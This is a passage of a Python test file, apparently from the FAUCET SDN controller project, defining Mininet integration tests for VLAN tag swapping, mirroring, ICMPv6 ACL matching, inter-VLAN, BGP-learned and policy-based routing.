description: "untagged"
"""

    CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 200
tagged_vlans: [100]
%(port_2)d:
native_vlan: 200
tagged_vlans: [100]
%(port_3)d:
native_vlan: 200
tagged_vlans: [100]
%(port_4)d:
native_vlan: 200
tagged_vlans: [100]
"""

    def test_tagged(self):
        """Tagged ping-all, then pairwise pings on native-VLAN alias addresses."""
        self.ping_all_when_learned()
        # One 10.99.99.x alias per host on the untagged (root) interface.
        native_ips = [
            ipaddress.ip_interface('10.99.99.%u/24' % (i + 1)) for i in range(len(self.hosts_name_ordered()))]
        for native_ip, host in zip(native_ips, self.hosts_name_ordered()):
            self.host_ipv4_alias(host, native_ip, intf=host.intf_root_name)
        # Every host pings every other host's native-VLAN alias.
        for own_native_ip, host in zip(native_ips, self.hosts_name_ordered()):
            for native_ip in native_ips:
                if native_ip != own_native_ip:
                    self.one_ipv4_ping(host, native_ip.ip, intf=host.intf_root_name)
class FaucetTaggedSwapVidMirrorTest(FaucetTaggedTest):
    """ACL mirrors VLAN 100 traffic to port 3 and swaps its VID to 101."""

    CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
101:
description: "tagged"
acls:
1:
- rule:
vlan_vid: 100
actions:
mirror: %(port_3)d
force_port_vlan: 1
output:
swap_vid: 101
allow: 1
"""

    CONFIG = """
interfaces:
%(port_1)d:
tagged_vlans: [100]
acl_in: 1
%(port_2)d:
tagged_vlans: [101]
%(port_3)d:
tagged_vlans: [100]
%(port_4)d:
tagged_vlans: [100]
"""

    def test_tagged(self):
        """Output host must see swapped VID 101; mirror host the original VID 100."""
        first_host, second_host, third_host = self.hosts_name_ordered()[:3]

        def test_acl(tcpdump_host, tcpdump_filter):
            # Static ARP entry so the ping needs no ARP resolution;
            # fping generates the ICMP that should match the ACL.
            tcpdump_txt = self.tcpdump_helper(
                tcpdump_host, tcpdump_filter, [
                    lambda: first_host.cmd(
                        'arp -s %s %s' % (second_host.IP(), '01:02:03:04:05:06')),
                    lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, second_host.IP())))],
                root_intf=True)
            self.assertTrue(re.search(
                '%s: ICMP echo request' % second_host.IP(), tcpdump_txt))
            self.assertTrue(re.search(
                tcpdump_filter, tcpdump_txt))

        # Saw swapped VID on second host
        test_acl(second_host, 'vlan 101')
        # Saw original VID on mirror host
        test_acl(third_host, 'vlan 100')
class FaucetTaggedOrderedSwapVidMirrorTest(FaucetTaggedTest):
    """Same as FaucetTaggedSwapVidMirrorTest but with ordered (list) ACL actions."""

    CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
101:
description: "tagged"
acls:
1:
- rule:
vlan_vid: 100
actions:
mirror: %(port_3)d
force_port_vlan: 1
output:
- swap_vid: 101
allow: 1
"""

    CONFIG = """
interfaces:
%(port_1)d:
tagged_vlans: [100]
acl_in: 1
%(port_2)d:
tagged_vlans: [101]
%(port_3)d:
tagged_vlans: [100]
%(port_4)d:
tagged_vlans: [100]
"""

    def test_tagged(self):
        """Output host must see swapped VID 101; mirror host the original VID 100."""
        first_host, second_host, third_host = self.hosts_name_ordered()[:3]

        def test_acl(tcpdump_host, tcpdump_filter):
            # Static ARP entry so the ping needs no ARP resolution;
            # fping generates the ICMP that should match the ACL.
            tcpdump_txt = self.tcpdump_helper(
                tcpdump_host, tcpdump_filter, [
                    lambda: first_host.cmd(
                        'arp -s %s %s' % (second_host.IP(), '01:02:03:04:05:06')),
                    lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, second_host.IP())))],
                root_intf=True)
            self.assertTrue(re.search(
                '%s: ICMP echo request' % second_host.IP(), tcpdump_txt))
            self.assertTrue(re.search(
                tcpdump_filter, tcpdump_txt))

        # Saw swapped VID on second host
        test_acl(second_host, 'vlan 101')
        # Saw original VID on mirror host
        test_acl(third_host, 'vlan 100')
class FaucetTaggedSwapVidOutputTest(FaucetTaggedTest):
    """ACL output action swaps VID 100 -> 101 and sends directly to port 2."""

    CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
unicast_flood: False
101:
description: "tagged"
unicast_flood: False
acls:
1:
- rule:
vlan_vid: 100
actions:
output:
swap_vid: 101
port: %(port_2)d
"""

    CONFIG = """
interfaces:
%(port_1)d:
tagged_vlans: [100]
acl_in: 1
%(port_2)d:
tagged_vlans: [101]
%(port_3)d:
tagged_vlans: [100]
%(port_4)d:
tagged_vlans: [100]
"""

    def test_tagged(self):
        """ICMP sent from port 1 must arrive on port 2 carrying VLAN 101."""
        first_host, second_host = self.hosts_name_ordered()[0:2]
        # we expect to see the swapped VLAN VID
        tcpdump_filter = 'vlan 101'
        tcpdump_txt = self.tcpdump_helper(
            second_host, tcpdump_filter, [
                lambda: first_host.cmd(
                    'arp -s %s %s' % (second_host.IP(), '01:02:03:04:05:06')),
                lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, second_host.IP())))],
            root_intf=True)
        self.assertTrue(re.search(
            '%s: ICMP echo request' % second_host.IP(), tcpdump_txt))
        self.assertTrue(re.search(
            'vlan 101', tcpdump_txt))
class FaucetTaggedSwapVidOrderedOutputTest(FaucetTaggedTest):
    """Same as FaucetTaggedSwapVidOutputTest but with ordered (list) output actions."""

    CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
unicast_flood: False
101:
description: "tagged"
unicast_flood: False
acls:
1:
- rule:
vlan_vid: 100
actions:
output:
- swap_vid: 101
- port: %(port_2)d
"""

    CONFIG = """
interfaces:
%(port_1)d:
tagged_vlans: [100]
acl_in: 1
%(port_2)d:
tagged_vlans: [101]
%(port_3)d:
tagged_vlans: [100]
%(port_4)d:
tagged_vlans: [100]
"""

    def test_tagged(self):
        """ICMP sent from port 1 must arrive on port 2 carrying VLAN 101."""
        first_host, second_host = self.hosts_name_ordered()[0:2]
        # we expect to see the swapped VLAN VID
        tcpdump_filter = 'vlan 101'
        tcpdump_txt = self.tcpdump_helper(
            second_host, tcpdump_filter, [
                lambda: first_host.cmd(
                    'arp -s %s %s' % (second_host.IP(), '01:02:03:04:05:06')),
                lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, second_host.IP())))],
            root_intf=True)
        self.assertTrue(re.search(
            '%s: ICMP echo request' % second_host.IP(), tcpdump_txt))
        self.assertTrue(re.search(
            'vlan 101', tcpdump_txt))
class FaucetTaggedPopVlansOutputTest(FaucetTaggedTest):
    """ACL rewrites dst MAC, pops the VLAN tag and outputs to port 2."""

    CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
unicast_flood: False
acls:
1:
- rule:
vlan_vid: 100
dl_dst: "01:02:03:04:05:06"
actions:
output:
set_fields:
- eth_dst: "06:06:06:06:06:06"
pop_vlans: 1
port: %(port_2)d
"""

    CONFIG = """
interfaces:
%(port_1)d:
tagged_vlans: [100]
acl_in: 1
%(port_2)d:
tagged_vlans: [100]
%(port_3)d:
tagged_vlans: [100]
%(port_4)d:
tagged_vlans: [100]
"""

    def test_tagged(self):
        """Expect untagged ICMP with the rewritten dst MAC on port 2."""
        first_host, second_host = self.hosts_name_ordered()[0:2]
        tcpdump_filter = 'icmp and ether dst 06:06:06:06:06:06 and not vlan'
        tcpdump_txt = self.tcpdump_helper(
            second_host, tcpdump_filter, [
                lambda: first_host.cmd(
                    'arp -s %s %s' % (second_host.IP(), '01:02:03:04:05:06')),
                lambda: first_host.cmd(
                    ' '.join((self.FPINGS_ARGS_ONE, second_host.IP())))],
            packets=10, root_intf=True)
        self.assertTrue(re.search(
            '%s: ICMP echo request' % second_host.IP(), tcpdump_txt))
class FaucetTaggedPopVlansOrderedOutputTest(FaucetTaggedTest):
    """Same as FaucetTaggedPopVlansOutputTest but with ordered (list) output actions."""

    CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
unicast_flood: False
acls:
1:
- rule:
vlan_vid: 100
dl_dst: "01:02:03:04:05:06"
actions:
output:
- set_fields:
- eth_dst: "06:06:06:06:06:06"
- pop_vlans: 1
- port: %(port_2)d
"""

    CONFIG = """
interfaces:
%(port_1)d:
tagged_vlans: [100]
acl_in: 1
%(port_2)d:
tagged_vlans: [100]
%(port_3)d:
tagged_vlans: [100]
%(port_4)d:
tagged_vlans: [100]
"""

    def test_tagged(self):
        """Expect untagged ICMP with the rewritten dst MAC on port 2."""
        first_host, second_host = self.hosts_name_ordered()[0:2]
        tcpdump_filter = 'icmp and ether dst 06:06:06:06:06:06 and not vlan'
        tcpdump_txt = self.tcpdump_helper(
            second_host, tcpdump_filter, [
                lambda: first_host.cmd(
                    'arp -s %s %s' % (second_host.IP(), '01:02:03:04:05:06')),
                lambda: first_host.cmd(
                    ' '.join((self.FPINGS_ARGS_ONE, second_host.IP())))],
            packets=10, root_intf=True)
        self.assertTrue(re.search(
            '%s: ICMP echo request' % second_host.IP(), tcpdump_txt))
class FaucetTaggedIPv4ControlPlaneTest(FaucetTaggedTest):
    """Hosts on a tagged VLAN can ping the FAUCET IPv4 VIP (control plane)."""

    CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
faucet_vips: ["10.0.0.254/24"]
"""

    CONFIG = """
max_resolve_backoff_time: 1
""" + CONFIG_TAGGED_BOILER

    def test_ping_controller(self):
        """Host-to-host ping, then each host pings the controller VIP."""
        first_host, second_host = self.hosts_name_ordered()[0:2]
        self.one_ipv4_ping(first_host, second_host.IP())
        for host in first_host, second_host:
            self.one_ipv4_controller_ping(host)
class FaucetTaggedIPv6ControlPlaneTest(FaucetTaggedTest):
    """Hosts on a tagged VLAN can ping the FAUCET IPv6 VIP (control plane)."""

    CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
faucet_vips: ["fc00::1:254/112"]
"""

    CONFIG = """
max_resolve_backoff_time: 1
""" + CONFIG_TAGGED_BOILER

    def test_ping_controller(self):
        """Assign v6 addresses, host-to-host ping, then ping the controller VIP."""
        first_host, second_host = self.hosts_name_ordered()[0:2]
        self.add_host_ipv6_address(first_host, 'fc00::1:1/112')
        self.add_host_ipv6_address(second_host, 'fc00::1:2/112')
        self.one_ipv6_ping(first_host, 'fc00::1:2')
        for host in first_host, second_host:
            self.one_ipv6_controller_ping(host)
class FaucetTaggedICMPv6ACLTest(FaucetTaggedTest):
    """ACL matches ICMPv6 neighbor solicitation (type 135) for a specific ND target."""

    CONFIG_GLOBAL = """
acls:
1:
- rule:
dl_type: %u
vlan_vid: 100
ip_proto: 58
icmpv6_type: 135
ipv6_nd_target: "fc00::1:2"
actions:
output:
port: %s
- rule:
actions:
allow: 1
vlans:
100:
description: "tagged"
faucet_vips: ["fc00::1:254/112"]
""" % (IPV6_ETH, '%(port_2)d')

    CONFIG = """
max_resolve_backoff_time: 1
interfaces:
%(port_1)d:
tagged_vlans: [100]
acl_in: 1
%(port_2)d:
tagged_vlans: [100]
%(port_3)d:
tagged_vlans: [100]
%(port_4)d:
tagged_vlans: [100]
"""

    def test_icmpv6_acl_match(self):
        """Ping over v6, then verify the ND-target ACL rule matched packets."""
        first_host, second_host = self.hosts_name_ordered()[0:2]
        self.add_host_ipv6_address(first_host, 'fc00::1:1/112')
        self.add_host_ipv6_address(second_host, 'fc00::1:2/112')
        self.one_ipv6_ping(first_host, 'fc00::1:2')
        self.wait_nonzero_packet_count_flow(
            {'dl_type': IPV6_ETH, 'ip_proto': 58, 'icmpv6_type': 135,
             'ipv6_nd_target': 'fc00::1:2'}, table_id=self._PORT_ACL_TABLE)
class FaucetTaggedICMPv6OrderedACLTest(FaucetTaggedTest):
    """Same as FaucetTaggedICMPv6ACLTest but with ordered (list) output actions."""

    CONFIG_GLOBAL = """
acls:
1:
- rule:
dl_type: %u
vlan_vid: 100
ip_proto: 58
icmpv6_type: 135
ipv6_nd_target: "fc00::1:2"
actions:
output:
- port: %s
- rule:
actions:
allow: 1
vlans:
100:
description: "tagged"
faucet_vips: ["fc00::1:254/112"]
""" % (IPV6_ETH, '%(port_2)d')

    CONFIG = """
max_resolve_backoff_time: 1
interfaces:
%(port_1)d:
tagged_vlans: [100]
acl_in: 1
%(port_2)d:
tagged_vlans: [100]
%(port_3)d:
tagged_vlans: [100]
%(port_4)d:
tagged_vlans: [100]
"""

    def test_icmpv6_acl_match(self):
        """Ping over v6, then verify the ND-target ACL rule matched packets."""
        first_host, second_host = self.hosts_name_ordered()[0:2]
        self.add_host_ipv6_address(first_host, 'fc00::1:1/112')
        self.add_host_ipv6_address(second_host, 'fc00::1:2/112')
        self.one_ipv6_ping(first_host, 'fc00::1:2')
        self.wait_nonzero_packet_count_flow(
            {'dl_type': IPV6_ETH, 'ip_proto': 58, 'icmpv6_type': 135,
             'ipv6_nd_target': 'fc00::1:2'}, table_id=self._PORT_ACL_TABLE)
class FaucetTaggedIPv4RouteTest(FaucetTaggedTest):
    """Static IPv4 routes on a tagged VLAN, surviving MAC swaps and restarts."""

    CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
faucet_vips: ["10.0.0.254/24"]
routes:
- route:
ip_dst: "10.0.1.0/24"
ip_gw: "10.0.0.1"
- route:
ip_dst: "10.0.2.0/24"
ip_gw: "10.0.0.2"
- route:
ip_dst: "10.0.3.0/24"
ip_gw: "10.0.0.2"
200:
description: "not used"
300:
description: "not used"
"""

    CONFIG = """
arp_neighbor_timeout: 2
max_resolve_backoff_time: 1
interfaces:
%(port_1)d:
tagged_vlans: [100]
%(port_2)d:
tagged_vlans: [100]
%(port_3)d:
tagged_vlans: [100]
%(port_4)d:
native_vlan: 200
"""

    def test_tagged(self):
        """Routing verified across repeated MAC swaps and cold starts; then warm start."""
        self._enable_event_log()
        host_pair = self.hosts_name_ordered()[:2]
        first_host, second_host = host_pair
        first_host_routed_ip = ipaddress.ip_interface('10.0.1.1/24')
        second_host_routed_ip = ipaddress.ip_interface('10.0.2.1/24')
        for _coldstart in range(2):
            for _swaps in range(3):
                self.verify_ipv4_routing(
                    first_host, first_host_routed_ip,
                    second_host, second_host_routed_ip)
                self.swap_host_macs(first_host, second_host)
            self.coldstart_conf()
        # change of a VLAN/ports not involved in routing, should be a warm start.
        for vid in (300, 200):
            self.change_port_config(
                self.port_map['port_4'], 'native_vlan', vid,
                restart=True, cold_start=False)
        self.wait_until_matching_lines_from_file(
            r'.+L3_LEARN.+10.0.0.[12].+', self.event_log)
class FaucetTaggedTargetedResolutionIPv4RouteTest(FaucetTaggedIPv4RouteTest):
    """Same routing test but with targeted_gw_resolution enabled on the VLAN."""

    CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
faucet_vips: ["10.0.0.254/24"]
targeted_gw_resolution: True
routes:
- route:
ip_dst: "10.0.1.0/24"
ip_gw: "10.0.0.1"
- route:
ip_dst: "10.0.2.0/24"
ip_gw: "10.0.0.2"
- route:
ip_dst: "10.0.3.0/24"
ip_gw: "10.0.0.2"
"""
class FaucetTaggedProactiveNeighborIPv4RouteTest(FaucetTaggedTest):
    """Proactive IPv4 learning resolves a neighbor FAUCET has not yet seen."""

    CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
faucet_vips: ["10.0.0.254/24"]
"""

    CONFIG = """
nd_neighbor_timeout: 2
max_resolve_backoff_time: 1
proactive_learn_v4: True
""" + CONFIG_TAGGED_BOILER

    def test_tagged(self):
        """Ping an unlearned alias via the VIP; neighbor count must rise above 1."""
        host_pair = self.hosts_name_ordered()[:2]
        first_host, second_host = host_pair
        first_host_alias_ip = ipaddress.ip_interface('10.0.0.99/24')
        # Host route (/32) for the alias address.
        first_host_alias_host_ip = ipaddress.ip_interface(
            ipaddress.ip_network(first_host_alias_ip.ip))
        self.host_ipv4_alias(first_host, first_host_alias_ip)
        self.add_host_route(second_host, first_host_alias_host_ip, self.FAUCET_VIPV4.ip)
        self.one_ipv4_ping(second_host, first_host_alias_ip.ip)
        self.assertGreater(
            self.scrape_prometheus_var(
                'vlan_neighbors', {'ipv': '4', 'vlan': '100'}),
            1)
class FaucetTaggedProactiveNeighborIPv6RouteTest(FaucetTaggedTest):
    """Proactive IPv6 learning resolves a neighbor FAUCET has not yet seen."""

    CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
faucet_vips: ["fc00::1:3/64"]
"""

    CONFIG = """
nd_neighbor_timeout: 2
max_resolve_backoff_time: 1
proactive_learn_v6: True
""" + CONFIG_TAGGED_BOILER

    def test_tagged(self):
        """Ping an unlearned v6 alias via the VIP; neighbor count must rise above 1."""
        host_pair = self.hosts_name_ordered()[:2]
        first_host, second_host = host_pair
        first_host_alias_ip = ipaddress.ip_interface('fc00::1:99/64')
        faucet_vip_ip = ipaddress.ip_interface('fc00::1:3/126')
        # Host route (/128) for the alias address.
        first_host_alias_host_ip = ipaddress.ip_interface(
            ipaddress.ip_network(first_host_alias_ip.ip))
        self.add_host_ipv6_address(first_host, ipaddress.ip_interface('fc00::1:1/64'))
        # We use a narrower mask to force second_host to use the /128 route,
        # since otherwise it would realize :99 is directly connected via ND and send direct.
        self.add_host_ipv6_address(second_host, ipaddress.ip_interface('fc00::1:2/126'))
        self.add_host_ipv6_address(first_host, first_host_alias_ip)
        self.add_host_route(second_host, first_host_alias_host_ip, faucet_vip_ip.ip)
        self.one_ipv6_ping(second_host, first_host_alias_ip.ip)
        self.assertGreater(
            self.scrape_prometheus_var(
                'vlan_neighbors', {'ipv': '6', 'vlan': '100'}),
            1)
class FaucetUntaggedIPv4GlobalInterVLANRouteTest(FaucetUntaggedTest):
    """Inter-VLAN routing via a global VLAN, with a BGP-learned route.

    Also verifies that a BGP route whose nexthop is not in any routed VLAN
    is rejected.
    """

    NUM_FAUCET_CONTROLLERS = 1
    FAUCET_MAC2 = '0e:00:00:00:00:02'  # faucet_mac for VLAN 200.

    CONFIG_GLOBAL = """
vlans:
100:
faucet_vips: ["10.100.0.254/24"]
200:
faucet_vips: ["10.200.0.254/24"]
faucet_mac: "%s"
""" % FAUCET_MAC2 + """
routers:
global:
vlans: [100, 200]
bgp:
as: 1
connect_mode: "passive"
port: %(bgp_port)d
routerid: "1.1.1.1"
server_addresses: ["127.0.0.1", "::1"]
neighbor_addresses: ["127.0.0.1", "::1"]
vlan: 100
""" + """
neighbor_as: %u
""" % PEER_BGP_AS

    CONFIG = """
global_vlan: 300
arp_neighbor_timeout: 2
max_resolve_backoff_time: 1
proactive_learn_v4: True
interfaces:
%(port_1)d:
native_vlan: 100
%(port_2)d:
native_vlan: 200
%(port_3)d:
native_vlan: 200
%(port_4)d:
native_vlan: 200
"""

    # Peer advertises one valid route and one with an unrouteable nexthop.
    exabgp_peer_conf = """
static {
route 10.99.99.0/24 next-hop 10.200.0.1 local-preference 100;
route 10.0.5.0/24 next-hop 127.0.0.1;
}
"""
    exabgp_log = None
    exabgp_err = None
    config_ports = {'bgp_port': None}

    def post_start_net(self):
        """Start the exabgp peer after the network is up."""
        exabgp_conf = self.get_exabgp_conf(
            mininet_test_util.LOCALHOST, self.exabgp_peer_conf)
        self.exabgp_log, self.exabgp_err = self.start_exabgp(exabgp_conf)

    def test_untagged(self):
        """Route between VLANs 100/200, check VIP MACs, BGP route and rejection."""
        first_host_ip = ipaddress.ip_interface('10.100.0.1/24')
        first_faucet_vip = ipaddress.ip_interface('10.100.0.254/24')
        second_host_ip = ipaddress.ip_interface('10.200.0.1/24')
        second_faucet_vip = ipaddress.ip_interface('10.200.0.254/24')
        first_host, second_host = self.hosts_name_ordered()[:2]
        first_host.setIP(str(first_host_ip.ip), prefixLen=24)
        second_host.setIP(str(second_host_ip.ip), prefixLen=24)
        self.add_host_route(first_host, second_host_ip, first_faucet_vip.ip)
        self.add_host_route(second_host, first_host_ip, second_faucet_vip.ip)
        self.one_ipv4_ping(first_host, second_host_ip.ip)
        self.one_ipv4_ping(second_host, first_host_ip.ip)
        # Each VLAN's VIP must resolve to that VLAN's FAUCET MAC.
        self.assertEqual(
            self._ip_neigh(first_host, first_faucet_vip.ip, 4), self.FAUCET_MAC)
        self.assertEqual(
            self._ip_neigh(second_host, second_faucet_vip.ip, 4), self.FAUCET_MAC2)
        # BGP-learned route appears as a flow on the global VLAN.
        self.wait_for_route_as_flow(
            second_host.MAC(), ipaddress.IPv4Network('10.99.99.0/24'), vlan_vid=300)
        self.verify_invalid_bgp_route(r'.+10.0.5.0\/24.+because nexthop not in VLAN.+')
class FaucetUntaggedIPv4InterVLANRouteTest(FaucetUntaggedTest):
    """Inter-VLAN IPv4 routing between VLAN 100 and named VLAN 'vlanb'."""

    FAUCET_MAC2 = '0e:00:00:00:00:02'  # faucet_mac for vlanb.

    CONFIG_GLOBAL = """
vlans:
100:
faucet_vips: ["10.100.0.254/24", "169.254.1.1/24"]
vlanb:
vid: 200
faucet_vips: ["10.200.0.254/24", "169.254.2.1/24"]
faucet_mac: "%s"
routers:
router-1:
vlans: [100, vlanb]
""" % FAUCET_MAC2

    CONFIG = """
arp_neighbor_timeout: 2
max_resolve_backoff_time: 1
proactive_learn_v4: True
interfaces:
%(port_1)d:
native_vlan: 100
%(port_2)d:
native_vlan: vlanb
%(port_3)d:
native_vlan: vlanb
%(port_4)d:
native_vlan: vlanb
"""

    def test_untagged(self):
        """Routing works before and after changing vlanb's VID (cold start each time)."""
        first_host_ip = ipaddress.ip_interface('10.100.0.1/24')
        first_faucet_vip = ipaddress.ip_interface('10.100.0.254/24')
        second_host_ip = ipaddress.ip_interface('10.200.0.1/24')
        second_faucet_vip = ipaddress.ip_interface('10.200.0.254/24')
        first_host, second_host = self.hosts_name_ordered()[:2]
        first_host.setIP(str(first_host_ip.ip), prefixLen=24)
        second_host.setIP(str(second_host_ip.ip), prefixLen=24)
        self.add_host_route(first_host, second_host_ip, first_faucet_vip.ip)
        self.add_host_route(second_host, first_host_ip, second_faucet_vip.ip)
        for vlanb_vid in (300, 200):
            self.one_ipv4_ping(first_host, second_host_ip.ip)
            self.one_ipv4_ping(second_host, first_host_ip.ip)
            self.assertEqual(
                self._ip_neigh(first_host, first_faucet_vip.ip, 4), self.FAUCET_MAC)
            self.assertEqual(
                self._ip_neigh(second_host, second_faucet_vip.ip, 4), self.FAUCET_MAC2)
            self.change_vlan_config(
                'vlanb', 'vid', vlanb_vid, restart=True, cold_start=True)
class FaucetUntaggedPortSwapIPv4InterVLANRouteTest(FaucetUntaggedTest):
    """Inter-VLAN routing continues after swapping vlana's port (delete 1, add 3)."""

    FAUCET_MAC2 = '0e:00:00:00:00:02'  # faucet_mac for vlanb.

    CONFIG_GLOBAL = """
vlans:
vlana:
vid: 100
faucet_vips: ["10.100.0.254/24", "169.254.1.1/24"]
vlanb:
vid: 200
faucet_vips: ["10.200.0.254/24", "169.254.2.1/24"]
faucet_mac: "%s"
routers:
router-1:
vlans: [vlana, vlanb]
""" % FAUCET_MAC2

    CONFIG = """
arp_neighbor_timeout: 2
max_resolve_backoff_time: 1
proactive_learn_v4: True
interfaces:
%(port_1)d:
native_vlan: vlana
%(port_2)d:
native_vlan: vlanb
"""

    def test_untagged(self):
        """Verify routing, swap vlana's port via config change, verify again."""
        first_host_ip = ipaddress.ip_interface('10.100.0.1/24')
        first_faucet_vip = ipaddress.ip_interface('10.100.0.254/24')
        second_host_ip = ipaddress.ip_interface('10.200.0.1/24')
        second_faucet_vip = ipaddress.ip_interface('10.200.0.254/24')
        first_host, second_host, third_host = self.hosts_name_ordered()[:3]

        def test_connectivity(host_a, host_b):
            # Reassigns the same IPs/routes so the check works for either port pairing.
            host_a.setIP(str(first_host_ip.ip), prefixLen=24)
            host_b.setIP(str(second_host_ip.ip), prefixLen=24)
            self.add_host_route(host_a, second_host_ip, first_faucet_vip.ip)
            self.add_host_route(host_b, first_host_ip, second_faucet_vip.ip)
            self.one_ipv4_ping(host_a, second_host_ip.ip)
            self.one_ipv4_ping(host_b, first_host_ip.ip)
            self.assertEqual(
                self._ip_neigh(host_a, first_faucet_vip.ip, 4), self.FAUCET_MAC)
            self.assertEqual(
                self._ip_neigh(host_b, second_faucet_vip.ip, 4), self.FAUCET_MAC2)

        test_connectivity(first_host, second_host)
        # Delete port 1, add port 3
        self.change_port_config(
            self.port_map['port_1'], None, None,
            restart=False, cold_start=False)
        self.add_port_config(
            self.port_map['port_3'], {'native_vlan': 'vlana'},
            restart=True, cold_start=True)
        test_connectivity(third_host, second_host)
class FaucetUntaggedExpireIPv4InterVLANRouteTest(FaucetUntaggedTest):
    """Dead-route expiry: routing recovers after a host interface goes down/up."""

    FAUCET_MAC2 = '0e:00:00:00:00:02'  # faucet_mac for vlanb.

    CONFIG_GLOBAL = """
vlans:
100:
faucet_vips: ["10.100.0.254/24"]
vlanb:
vid: 200
faucet_vips: ["10.200.0.254/24"]
faucet_mac: "%s"
routers:
router-1:
vlans: [100, vlanb]
""" % FAUCET_MAC2

    CONFIG = """
arp_neighbor_timeout: 2
max_resolve_backoff_time: 1
max_host_fib_retry_count: 2
proactive_learn_v4: True
interfaces:
%(port_1)d:
native_vlan: 100
%(port_2)d:
native_vlan: vlanb
%(port_3)d:
native_vlan: vlanb
%(port_4)d:
native_vlan: vlanb
"""

    def test_untagged(self):
        """Ping, take second host down until FAUCET expires it, bring up, re-ping."""
        first_host_ip = ipaddress.ip_interface('10.100.0.1/24')
        first_faucet_vip = ipaddress.ip_interface('10.100.0.254/24')
        second_host_ip = ipaddress.ip_interface('10.200.0.1/24')
        second_faucet_vip = ipaddress.ip_interface('10.200.0.254/24')
        first_host, second_host = self.hosts_name_ordered()[:2]
        first_host.setIP(str(first_host_ip.ip), prefixLen=24)
        second_host.setIP(str(second_host_ip.ip), prefixLen=24)
        self.add_host_route(first_host, second_host_ip, first_faucet_vip.ip)
        self.add_host_route(second_host, first_host_ip, second_faucet_vip.ip)
        self.one_ipv4_ping(first_host, second_host_ip.ip)
        self.one_ipv4_ping(second_host, first_host_ip.ip)
        # Take the interface down and wait for FAUCET to expire the route.
        second_host.cmd('ifconfig %s down' % second_host.defaultIntf().name)
        expired_re = r'.+expiring dead route %s.+' % second_host_ip.ip
        self.wait_until_matching_lines_from_faucet_log_files(expired_re)
        # Bring it back; the host route must be re-added and pings succeed again.
        second_host.cmd('ifconfig %s up' % second_host.defaultIntf().name)
        self.add_host_route(second_host, first_host_ip, second_faucet_vip.ip)
        self.one_ipv4_ping(second_host, first_host_ip.ip)
        self.one_ipv4_ping(first_host, second_host_ip.ip)
class FaucetUntaggedIPv6InterVLANRouteTest(FaucetUntaggedTest):
    """Inter-VLAN IPv6 routing between VLAN 100 and named VLAN 'vlanb'."""

    FAUCET_MAC2 = '0e:00:00:00:00:02'  # faucet_mac for vlanb.

    CONFIG_GLOBAL = """
vlans:
100:
faucet_vips: ["fc00::1:254/112", "fe80::1:254/112"]
vlanb:
vid: 200
faucet_vips: ["fc01::1:254/112", "fe80::2:254/112"]
faucet_mac: "%s"
routers:
router-1:
vlans: [100, vlanb]
""" % FAUCET_MAC2

    CONFIG = """
nd_neighbor_timeout: 2
max_resolve_backoff_time: 1
proactive_learn_v6: True
interfaces:
%(port_1)d:
native_vlan: 100
%(port_2)d:
native_vlan: vlanb
%(port_3)d:
native_vlan: vlanb
%(port_4)d:
native_vlan: vlanb
"""

    def test_untagged(self):
        """Route fc00:: <-> fc01:: between the two VLANs via the FAUCET VIPs."""
        host_pair = self.hosts_name_ordered()[:2]
        first_host, second_host = host_pair
        first_host_net = ipaddress.ip_interface('fc00::1:1/64')
        second_host_net = ipaddress.ip_interface('fc01::1:1/64')
        self.add_host_ipv6_address(first_host, first_host_net)
        self.add_host_ipv6_address(second_host, second_host_net)
        self.add_host_route(
            first_host, second_host_net, self.FAUCET_VIPV6.ip)
        self.add_host_route(
            second_host, first_host_net, self.FAUCET_VIPV6_2.ip)
        self.one_ipv6_ping(first_host, second_host_net.ip)
        self.one_ipv6_ping(second_host, first_host_net.ip)
class FaucetUntaggedIPv4PolicyRouteTest(FaucetUntaggedTest):
    """Policy-based routing: ACL swap_vid steers traffic to different routed VLANs.

    10.99.0.0/24 is routed via VLAN 200, but the single host 10.99.0.2 is
    policy-routed via VLAN 300 by a more specific ACL rule.
    """

    CONFIG_GLOBAL = """
vlans:
100:
description: "100"
faucet_vips: ["10.0.0.254/24"]
acl_in: pbr
200:
description: "200"
faucet_vips: ["10.20.0.254/24"]
routes:
- route:
ip_dst: "10.99.0.0/24"
ip_gw: "10.20.0.2"
300:
description: "300"
faucet_vips: ["10.30.0.254/24"]
routes:
- route:
ip_dst: "10.99.0.0/24"
ip_gw: "10.30.0.3"
acls:
pbr:
- rule:
vlan_vid: 100
dl_type: 0x800
nw_dst: "10.99.0.2"
actions:
allow: 1
output:
swap_vid: 300
- rule:
vlan_vid: 100
dl_type: 0x800
nw_dst: "10.99.0.0/24"
actions:
allow: 1
output:
swap_vid: 200
- rule:
actions:
allow: 1
routers:
router-100-200:
vlans: [100, 200]
router-100-300:
vlans: [100, 300]
"""

    CONFIG = """
arp_neighbor_timeout: 2
max_resolve_backoff_time: 1
interfaces:
%(port_1)d:
native_vlan: 100
%(port_2)d:
native_vlan: 200
%(port_3)d:
native_vlan: 300
%(port_4)d:
native_vlan: 100
"""

    def test_untagged(self):
        # 10.99.0.1 is on b2, and 10.99.0.2 is on b3
        # we want to route 10.99.0.0/24 to b2, but we want
        # want to PBR 10.99.0.2/32 to b3.
        first_host_ip = ipaddress.ip_interface('10.0.0.1/24')
        first_faucet_vip = ipaddress.ip_interface('10.0.0.254/24')
        second_host_ip = ipaddress.ip_interface('10.20.0.2/24')
        second_faucet_vip = ipaddress.ip_interface('10.20.0.254/24')
        third_host_ip = ipaddress.ip_interface('10.30.0.3/24')
        third_faucet_vip = ipaddress.ip_interface('10.30.0.254/24')
        first_host, second_host, third_host = self.hosts_name_ordered()[:3]
        remote_ip = ipaddress.ip_interface('10.99.0.1/24')
        remote_ip2 = ipaddress.ip_interface('10.99.0.2/24')
